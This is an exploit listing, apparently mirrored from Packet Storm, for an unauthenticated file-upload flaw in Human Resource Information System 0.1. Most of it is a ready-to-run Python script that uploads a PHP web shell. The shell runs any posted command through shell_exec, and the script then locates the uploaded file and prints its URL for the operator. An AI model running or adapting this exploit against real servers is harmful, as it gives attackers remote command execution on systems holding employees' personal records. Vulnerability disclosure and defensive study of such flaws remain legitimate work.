Exploit for Human Resource Information System 0.1 Remote Code Execution

## https://sploitus.com/exploit?id=PACKETSTORM:162496
# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)  
# Date: 04-05-2021  
# Exploit Author: Reza Afsahi  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html  
# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code  
# Version: 0.1  
# Tested on: PHP 7.4.11 , Linux x64_x86  
  
############################################################################################################  
  
# Description:  
# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.  
  
############################################################################################################  
  
# Proof of concept:  
  
#!/usr/bin/python3  
  
import requests  
import sys  
from bs4 import BeautifulSoup  
  
def find_shell(domain):  
req_2 = requests.get(domain + "/Admin_Dashboard/Add_employee.php")  
soup = BeautifulSoup(req_2.content , "html.parser")  
imgs = soup.find_all("img")  
for i in imgs:  
src = i['src']  
if ("shell.php" in src):  
print(" [!] Your shell is ready :) ==> " + domain + "/Admin_Dashboard/" + src + "\n")  
break  
else:  
continue  
  
def upload_file(domain):  
  
print("\n [!] Uploading Shell . . .")  
payload = """   
<!DOCTYPE html>  
<html>  
<head>  
<title> Shell </title>  
</head>  
<body>  
<form action="#" method="post">  
<input type="text" name="cmd" style="width: 300px; height: 30px;" placeholder="Your Command ...">  
<br><br>  
<input type="submit" name="submit" value="execute">  
</form>  
<?php   
$cmd = $_POST['cmd'];  
$result = shell_exec($cmd);  
echo "<pre>{$result}</pre>";  
  
?>  
</body>  
</html>  
"""  
  
h = {  
"Content-Type" : "multipart/form-data"  
}  
  
f = {'employee_image':('shell.php',payload,  
'application/x-php', {'Content-Disposition': 'form-data'}  
)  
}  
d = {  
"emplo" : "",  
"employee_companyid" : "test",  
"employee_firstname" : "test",  
"employee_lastname" : "test",  
"employee_middlename" : "test",  
"branches_datefrom" : "0011-11-11",  
"branches_recentdate" : "2222-11-11",  
"employee_position" : "test",  
"employee_contact" : "23123132132",  
"employee_sss" : "test",  
"employee_tin" : "test",  
"employee_hdmf_pagibig" : "test",  
"employee_gsis" : "test"  
}  
url = domain + "/Admin_Dashboard/process/addemployee_process.php"  
req = requests.post(url , data=d , files = f)  
if req.status_code == 200:  
if ("Insert Successfully" in req.text):  
print("\n [!] Shell uploaded succefully\n")  
find_shell(domain)  
  
else:  
print("Exploit Failed 1")  
  
def main():  
if len(sys.argv) != 2:  
print('[!] usage: %s <target url> ' % sys.argv[0])  
print('[!] eg: %s http://vulndomain.com' % sys.argv[0])  
sys.exit(-1)  
  
print("<><><><><><><><><><><><><><><><><><><><><><><><>")  
print("<> Human Resource Information System <>")  
print("<> Shell Uploader <>")  
print("<><><><><><><><><><><><><><><><><><><><><><><><>")  
target_domain = sys.argv[1]  
upload_file(target_domain)  
  
if __name__ == "__main__":  
main()